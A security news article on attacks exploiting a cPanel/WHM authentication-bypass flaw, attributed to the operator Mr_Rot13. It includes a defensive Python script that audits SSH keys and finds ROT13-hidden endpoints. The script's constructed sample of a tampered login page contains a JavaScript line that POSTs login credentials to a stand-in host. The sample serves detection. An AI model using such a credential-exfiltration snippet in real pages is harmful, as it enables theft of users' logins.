Researchers Link Active cPanel Attacks to Threat Actor Mr_Rot13

A recently disclosed critical vulnerability affecting cPanel and WebHost Manager (WHM) is now being actively exploited by multiple threat actors, with researchers attributing one of the campaigns to an operator known as Mr_Rot13.

The flaw, tracked as CVE-2026-41940, allows authentication bypass under certain conditions and could give remote attackers elevated access to vulnerable cPanel environments. Security researchers say exploitation activity began surfacing almost immediately after technical details surrounding the flaw became public, adding fresh pressure on organizations to improve visibility across internet-facing infrastructure and administrative systems.

According to findings from QiAnXin XLab, attackers have already used the vulnerability to distribute ransomware-related payloads, cryptocurrency miners, botnet malware, and persistent backdoors.

Researchers said they observed more than 2,000 source IP addresses participating in automated exploitation attempts globally. A large portion of the activity appeared to originate from infrastructure located in Germany, the United States, Brazil, and the Netherlands.

The scale of the scanning suggests the flaw has already been incorporated into broader automated attack activity commonly seen after high-profile infrastructure vulnerabilities are disclosed publicly.

Attack Chain Moves Beyond Initial Server Compromise

During the investigation, XLab researchers identified a shell script that downloads a Go-based payload from an external server using wget or curl utilities.

Attackers Establish Long-Term Access Through SSH and Web Shells

Once executed, the payload implants an SSH public key on the compromised system, allowing attackers to reconnect without relying on the original exploit path. Researchers also found a PHP-based web shell dropped onto infected servers.

The web shell gives attackers the ability to upload files, run remote commands, and move additional payloads onto the environment after initial access has been established.

At another stage of the intrusion, malicious JavaScript was injected into login workflows tied to the compromised cPanel environment. Instead of displaying the normal authentication page, users were shown a modified login interface designed to capture credentials.

Those stolen credentials were then forwarded to attacker-controlled infrastructure whose addresses, researchers said, had been obscured using ROT13 encoding.
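Two of the persistence and credential-theft artifacts described above (an implanted SSH public key and ROT13-obscured attacker addresses inside injected login JavaScript) can be hunted for with a short audit script. The following Python is an added example, not code from the XLab report or from cPanel; every input it checks (the authorized_keys content, the key baseline, the login-page fragment and the `example-exfil.invalid` endpoint) is constructed here for illustration, and the `rot13()` call in the sample JavaScript is a hypothetical helper name.

```python
"""Audit two post-exploitation artifacts of the kind described in the XLab report:
an attacker-added SSH public key in authorized_keys and ROT13-obscured hostnames
inside login-page JavaScript. All sample inputs below are constructed."""
import codecs
import re
import shlex

# Constructed authorized_keys content. The first two blobs form the approved
# baseline; the third stands in for a key an attacker implanted.
SAMPLE_AUTHORIZED_KEYS = """\
# admin jump host
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedAdminKey admin@jumphost
command="/usr/local/bin/backup",no-pty ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedBackupKey backup@nas
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABConstructedUnknownKey root@unknown
"""

BASELINE_KEY_BLOBS = {
    "AAAAC3NzaC1lZDI1NTE5AAAAIConstructedAdminKey",
    "AAAAC3NzaC1lZDI1NTE5AAAAIConstructedBackupKey",
}

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def parse_authorized_keys(text):
    """Yield (lineno, key_type, key_blob, comment) for each key line.

    Lines may start with options such as command="..." or no-pty before the key
    type, so the type token is located by prefix rather than assumed first."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = shlex.split(line)  # keeps quoted option values together
        idx = next((i for i, t in enumerate(tokens) if t.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None or idx + 1 >= len(tokens):
            continue  # malformed line; a production audit would report it
        yield lineno, tokens[idx], tokens[idx + 1], " ".join(tokens[idx + 2:])


def unexpected_keys(text, baseline_blobs):
    """Return key entries whose public-key blob is not in the approved baseline."""
    return [entry for entry in parse_authorized_keys(text) if entry[2] not in baseline_blobs]


# Constructed fragment of a tampered login page: the real cPanel URL is stored
# in clear text, while the credential-drop endpoint is stored ROT13-encoded (the
# obfuscation the report attributes to this operator) and decoded at submit time.
SAMPLE_LOGIN_JS = (
    'var form = document.getElementById("login_form");\n'
    'var banner = "Please sign in";\n'
    'var real = "https://cpanel.example.invalid/login";\n'
    'var drop = "' + codecs.encode("https://example-exfil.invalid/login", "rot13") + '";\n'
    'form.onsubmit = function () { fetch(rot13(drop), {method: "POST", body: new FormData(form)}); };\n'
)

# Single- or double-quoted JS string literal, honouring backslash escapes.
STRING_LITERAL = re.compile(r'''(["'])((?:\\.|(?!\1).)*)\1''')
# Dotted hostname with optional scheme and optional port or path.
ENDPOINT = re.compile(
    r'''^(?:https?://)?[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9-]+)+(?:[/:][^\s"']*)?$''', re.I)


def rot13_endpoints(js_text):
    """Return decoded values of string literals that look like a host or URL
    only after ROT13, i.e. addresses hidden the way the report describes."""
    hits = []
    for match in STRING_LITERAL.finditer(js_text):
        literal = match.group(2)
        decoded = codecs.decode(literal, "rot13")
        if ENDPOINT.match(decoded) and not ENDPOINT.match(literal):
            hits.append(decoded)
    return hits


if __name__ == "__main__":
    for lineno, key_type, blob, comment in unexpected_keys(SAMPLE_AUTHORIZED_KEYS, BASELINE_KEY_BLOBS):
        print(f"authorized_keys line {lineno}: unapproved {key_type} key ({comment})")
    for url in rot13_endpoints(SAMPLE_LOGIN_JS):
        print(f"ROT13-hidden endpoint in login JavaScript: {url}")
```

Run against real data, `unexpected_keys` would be fed each account's `~/.ssh/authorized_keys` with a baseline exported from the organization's key inventory, and `rot13_endpoints` would be run over the cPanel login templates and any JavaScript served alongside them; the plain-text URL and the ordinary UI strings in the sample are not reported, only the literal that becomes a dotted host after decoding.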

Filemanager Malware Expands Control Across Multiple Platforms

The final payload observed in the campaign was a cross-platform backdoor known as Filemanager. According to XLab, the malware can operate across Windows, Linux, and macOS systems.

Researchers said the malware includes remote shell access and file management functionality, giving operators broad visibility and control over compromised environments.

The investigation also found evidence of data collection activity targeting sensitive information stored on infected systems, including SSH-related data, bash history, device details, database credentials, and cPanel valiases.

Parts of the stolen information were reportedly transmitted to a Telegram group associated with a user identified as “0xWR.”

Hosting and Administrative Infrastructure Under Growing Pressure

The incident highlights how heavily exposed administrative environments continue to attract attacker attention, particularly when they are tied to shared hosting, cloud management, or multi-tenant infrastructure.

cPanel remains widely deployed across hosting providers, managed infrastructure environments, and enterprise web operations. Because these systems often manage multiple domains, users, and administrative functions from a single interface, a successful compromise can create wider operational consequences beyond the initially infected server.

For security teams, one of the bigger concerns is the speed at which exploitation activity is now developing after vulnerability disclosure.

In many organizations, externally exposed systems still move through patch validation, operational review, and change-control processes before updates are pushed into production. Attackers increasingly take advantage of that delay by automating reconnaissance and exploit deployment almost immediately after vulnerabilities become public.

Security leaders are also facing increased pressure to improve visibility into externally accessible management systems that may exist across subsidiaries, third-party hosting providers, or older infrastructure environments that are not always included in centralized security monitoring programs.

The campaign tied to CVE-2026-41940 also reflects a larger trend in which attackers are focusing less on individual user endpoints and more on administrative systems capable of opening access into broader infrastructure environments.

Researchers Believe the Operation May Have Been Active for Years

XLab researchers believe the infrastructure linked to Mr_Rot13 may not be new.

Part of this assessment is based on overlaps between domains detected in the present campaign and older malware samples published to VirusTotal in 2022. Researchers discovered that one of the command-and-control domains associated with the operation was registered in October 2020. 

They also said the threat actor’s tooling has historically maintained a very low detection rate across security products, making long-term visibility into the operation difficult.

“The detection rate of Mr_Rot13’s related samples and infrastructure across security products has remained extremely low,” XLab researchers said.

For enterprise defenders, the findings reinforce a growing concern surrounding stealth-oriented attacks targeting internet-facing infrastructure, especially platforms tied to identity management, hosting operations, and centralized administrative control.

Research and Intelligence Sources: blog.xlab.qianxin
